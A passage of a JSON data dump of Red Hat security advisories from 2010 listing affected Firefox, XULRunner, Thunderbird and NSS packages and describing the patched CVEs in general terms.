"firefox-debuginfo-3.6.12-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "i686", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "src", "packageName": "firefox", "packageFilename": "firefox-3.6.12-1.el6_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "src", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "x86_64", "packageName": "firefox-debuginfo", "packageFilename": "firefox-debuginfo-3.6.12-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "x86_64", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "i686", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "x86_64", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "i686", "packageName": "firefox", "packageFilename": "firefox-3.6.12-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "i686", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "x86_64", "packageName": "firefox", "packageFilename": "firefox-3.6.12-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "x86_64", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "ppc64", "packageName": "firefox-debuginfo", "packageFilename": "firefox-debuginfo-3.6.12-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc64", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc64", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "ppc64", "packageName": "firefox", "packageFilename": "firefox-3.6.12-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "ppc64", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "s390x", "packageName": "firefox-debuginfo", "packageFilename": "firefox-debuginfo-3.6.12-1.el6_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390x", "packageName": "xulrunner-debuginfo", "packageFilename": "xulrunner-debuginfo-1.9.2.12-1.el6_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390x", "packageName": "xulrunner-devel", "packageFilename": "xulrunner-devel-1.9.2.12-1.el6_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.6.12-1.el6_0", "arch": "s390x", "packageName": "firefox", "packageFilename": "firefox-3.6.12-1.el6_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "1.9.2.12-1.el6_0", "arch": "s390x", "packageName": "xulrunner", "packageFilename": "xulrunner-1.9.2.12-1.el6_0.s390x.rpm", "operator": "lt"}], "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nA race condition flaw was found in the way Firefox handled Document Object\nModel (DOM) element properties. Malicious HTML content could cause Firefox\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Firefox. (CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim had loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11 and 3.6.12. You can find links to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.12, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n", "reporter": "RedHat", "published": "2010-11-10T05:00:00", "type": "redhat", "title": "(RHSA-2010:0861) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183", "CVE-2010-3765"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:18", "id": "RHSA-2010:0861", "href": "https://access.redhat.com/errata/RHSA-2010:0861", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T21:10:38", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "i686", "packageName": "thunderbird-debuginfo", "packageFilename": "thunderbird-debuginfo-3.1.6-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "src", "packageName": "thunderbird", "packageFilename": "thunderbird-3.1.6-1.el6_0.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "x86_64", "packageName": "thunderbird-debuginfo", "packageFilename": "thunderbird-debuginfo-3.1.6-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "i686", "packageName": "thunderbird", "packageFilename": "thunderbird-3.1.6-1.el6_0.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "x86_64", "packageName": "thunderbird", "packageFilename": "thunderbird-3.1.6-1.el6_0.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "ppc64", "packageName": "thunderbird-debuginfo", "packageFilename": "thunderbird-debuginfo-3.1.6-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "ppc64", "packageName": "thunderbird", "packageFilename": "thunderbird-3.1.6-1.el6_0.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "s390x", "packageName": "thunderbird-debuginfo", "packageFilename": "thunderbird-debuginfo-3.1.6-1.el6_0.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "3.1.6-1.el6_0", "arch": "s390x", "packageName": "thunderbird", "packageFilename": "thunderbird-3.1.6-1.el6_0.s390x.rpm", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nA race condition flaw was found in the way Thunderbird handled Document\nObject Model (DOM) element properties. An HTML mail message containing\nmalicious content could cause Thunderbird to crash or, potentially, execute\narbitrary code with the privileges of the user running Thunderbird.\n(CVE-2010-3765)\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179,\nCVE-2010-3180, CVE-2010-3183)\n\nA same-origin policy bypass flaw was found in Thunderbird. Remote HTML\ncontent could steal private data from different remote HTML content\nThunderbird had loaded. (CVE-2010-3178)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n", "reporter": "RedHat", "published": "2010-11-17T05:00:00", "type": "redhat", "title": "(RHSA-2010:0896) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183", "CVE-2010-3765"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:28", "id": "RHSA-2010:0896", "href": "https://access.redhat.com/errata/RHSA-2010:0896", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:17", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "i386", "packageFilename": "firefox-3.6.11-2.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "i386", "packageFilename": "nss-3.12.8-1.el4.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.el4.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.el4.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "src", "packageFilename": "firefox-3.6.11-2.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "src", "packageFilename": "nss-3.12.8-1.el4.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ia64", "packageFilename": "nss-3.12.8-1.el4.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.el4.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.el4.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.el4.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.el4.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.el4.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "ppc", "packageFilename": "firefox-3.6.11-2.el4.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ppc", "packageFilename": "nss-3.12.8-1.el4.ppc.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ppc", "packageFilename": "nss-devel-3.12.8-1.el4.ppc.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ppc", "packageFilename": "nss-tools-3.12.8-1.el4.ppc.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "ppc64", "packageFilename": "nss-3.12.8-1.el4.ppc64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "s390", "packageFilename": "firefox-3.6.11-2.el4.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390", "packageFilename": "nss-3.12.8-1.el4.s390.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390", "packageFilename": "nss-devel-3.12.8-1.el4.s390.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390", "packageFilename": "nss-tools-3.12.8-1.el4.s390.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.6.11-2.el4", "arch": "s390x", "packageFilename": "firefox-3.6.11-2.el4.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390x", "packageFilename": "nss-3.12.8-1.el4.s390x.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390x", "packageFilename": "nss-devel-3.12.8-1.el4.s390x.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.12.8-1.el4", "arch": "s390x", "packageFilename": "nss-tools-3.12.8-1.el4.s390x.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "i386", "packageFilename": "firefox-3.6.11-2.el5.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "i386", "packageFilename": "nss-3.12.8-1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "i386", "packageFilename": "nss-tools-3.12.8-1.el5.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "i386", "packageFilename": "xulrunner-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "src", "packageFilename": "firefox-3.6.11-2.el5.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "src", "packageFilename": "nss-3.12.8-1.el5.src.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "src", "packageFilename": "xulrunner-1.9.2.11-2.el5.src.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "x86_64", "packageFilename": "firefox-3.6.11-2.el5.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "x86_64", "packageFilename": "nss-3.12.8-1.el5.x86_64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "x86_64", "packageFilename": "nss-tools-3.12.8-1.el5.x86_64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "x86_64", "packageFilename": "xulrunner-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "ppc", "packageFilename": "firefox-3.6.11-2.el5.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc", "packageFilename": "nss-3.12.8-1.el5.ppc.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc", "packageFilename": "nss-devel-3.12.8-1.el5.ppc.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.ppc.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc", "packageFilename": "nss-tools-3.12.8-1.el5.ppc.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc64", "packageFilename": "nss-3.12.8-1.el5.ppc64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc64", "packageFilename": "nss-devel-3.12.8-1.el5.ppc64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ppc64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.ppc64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ppc", "packageFilename": "xulrunner-1.9.2.11-2.el5.ppc.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ppc", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.ppc.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ppc64", "packageFilename": "xulrunner-1.9.2.11-2.el5.ppc64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ppc64", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.ppc64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "s390", "packageFilename": "firefox-3.6.11-2.el5.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "s390x", "packageFilename": "firefox-3.6.11-2.el5.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390", "packageFilename": "nss-3.12.8-1.el5.s390.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390", "packageFilename": "nss-devel-3.12.8-1.el5.s390.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.s390.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390x", "packageFilename": "nss-3.12.8-1.el5.s390x.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390x", "packageFilename": "nss-devel-3.12.8-1.el5.s390x.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390x", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.s390x.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "s390x", "packageFilename": "nss-tools-3.12.8-1.el5.s390x.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "s390", "packageFilename": "xulrunner-1.9.2.11-2.el5.s390.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "s390", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.s390.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "s390x", "packageFilename": "xulrunner-1.9.2.11-2.el5.s390x.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "s390x", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.s390x.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "i386", "packageFilename": "nss-devel-3.12.8-1.el5.i386.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "i386", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.i386.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "i386", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.i386.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "x86_64", "packageFilename": "nss-devel-3.12.8-1.el5.x86_64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "x86_64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.x86_64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "x86_64", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.x86_64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.6.11-2.el5", "arch": "ia64", "packageFilename": "firefox-3.6.11-2.el5.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ia64", "packageFilename": "nss-3.12.8-1.el5.ia64.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ia64", "packageFilename": "nss-devel-3.12.8-1.el5.ia64.rpm", "packageName": "nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ia64", "packageFilename": "nss-pkcs11-devel-3.12.8-1.el5.ia64.rpm", "packageName": "nss-pkcs11-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.8-1.el5", "arch": "ia64", "packageFilename": "nss-tools-3.12.8-1.el5.ia64.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ia64", "packageFilename": "xulrunner-1.9.2.11-2.el5.ia64.rpm", "packageName": "xulrunner", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "1.9.2.11-2.el5", "arch": "ia64", "packageFilename": "xulrunner-devel-1.9.2.11-2.el5.ia64.rpm", "packageName": "xulrunner-devel", "operator": "lt"}], "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox. Network Security Services (NSS) is\na set of libraries designed to support the development of security-enabled\nclient and server applications.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2010-3175, CVE-2010-3176, CVE-2010-3179, CVE-2010-3183,\nCVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in Firefox converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running Firefox, allow arbitrary JavaScript to be executed in the\ncontext of the Gopher domain. (CVE-2010-3177)\n\nA same-origin policy bypass flaw was found in Firefox. An attacker could\ncreate a malicious web page that, when viewed by a victim, could steal\nprivate data from a different website the victim has loaded with Firefox.\n(CVE-2010-3178)\n\nA flaw was found in the script that launches Firefox. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nFirefox, if that user ran Firefox from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nThis update also provides NSS version 3.12.8 which is required by the\nupdated Firefox version, fixing the following security issues:\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in Firefox accepted DHE keys that were 256\nbits in length. This 